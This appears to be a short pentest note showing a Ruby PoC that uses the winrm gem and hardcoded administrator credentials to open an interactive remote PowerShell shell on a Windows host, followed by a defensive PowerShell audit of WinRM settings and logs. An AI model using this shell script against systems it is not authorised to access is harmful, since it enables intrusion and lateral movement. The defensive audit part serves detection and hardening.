Winrm Shell

Windows Remote Management (WinRM) is a Windows-native, built-in remote management protocol that uses the Simple Object Access Protocol (SOAP) over HTTP(S) to interact with remote computers and servers, as well as their operating systems and applications. Source: link

If you have obtained valid credentials for a host and can reach its WinRM endpoint (port 5985, path /wsman), you can use the PoC below to obtain an interactive PowerShell shell.

The default HTTP port for winrm is 5985.

[email protected]:~# gem install winrm
[email protected]:~# cat winrm_shell.rb
require 'winrm'

# Connection details: replace the placeholder host with the target's address.
# WinRM over plain HTTP listens on 5985 and the WS-Management path is /wsman.
conn = WinRM::Connection.new(
  endpoint: 'http://<target-ip>:5985/wsman',
  user: 'administrator',
  password: 'administrator123'
)

command = ""

# Open a remote PowerShell runspace and keep it until the user types "exit".
conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    print "PS > "
    # Treat end-of-input (Ctrl-D) the same as typing "exit".
    command = gets || "exit\n"
    # Stream stdout and stderr back as the remote command produces them.
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
[email protected]:~#

Run the Ruby script to obtain the shell. Make sure the winrm gem is installed (gem install winrm) before running the PoC above.

[email protected]:~# ruby winrm_shell.rb
PS > whoami
PS >
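From the defender's side, the access shown above depends on a few host settings and leaves traces on the Windows host. The following is an added example, not part of the original post or the winrm gem: a read-only PowerShell audit run in an elevated prompt on the Windows host (PowerShell 5.1 or later assumed) that lists the WinRM listeners, the authentication and transport settings, the principals allowed to open sessions, and recent shell-creation events. The WSMan: drive paths and cmdlets are the standard ones; the limit of 20 events is an arbitrary choice.

```powershell
# Added example (not from the original post): audit the WinRM service on a
# Windows host from an elevated PowerShell prompt. Read-only; nothing is changed.

# 1. Which listeners exist, on which transport and port? The HTTP listener on
#    5985 is the one the Ruby PoC above connects to.
Get-ChildItem WSMan:\localhost\Listener | ForEach-Object {
    Get-ChildItem $_.PSPath | Select-Object Name, Value
}

# 2. Authentication and transport settings. Basic auth combined with
#    AllowUnencrypted=true sends credentials over plain HTTP.
Get-Item WSMan:\localhost\Service\AllowUnencrypted | Select-Object Name, Value
Get-ChildItem WSMan:\localhost\Service\Auth | Select-Object Name, Value

# 3. Who may open a remote session? The Permission column shows the SDDL /
#    group grants (Administrators and "Remote Management Users" by default).
Get-PSSessionConfiguration | Select-Object Name, Permission

# 4. Recent shell creations recorded by WinRM itself (Event ID 91 in the
#    Microsoft-Windows-WinRM/Operational log). Each inbound shell, including
#    one opened by the Ruby script above, produces an entry here.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-WinRM/Operational'
    Id      = 91
} -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message
```

Step 2 is the setting to check first: an HTTP listener with Basic authentication and unencrypted traffic allowed means the credentials used by the PoC are recoverable from a packet capture, whereas an HTTPS listener on 5986 or Kerberos/NTLM over the HTTP listener keeps them protected. Step 3 is the place to restrict access, since removing accounts from the granted groups closes the endpoint to them regardless of password knowledge.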
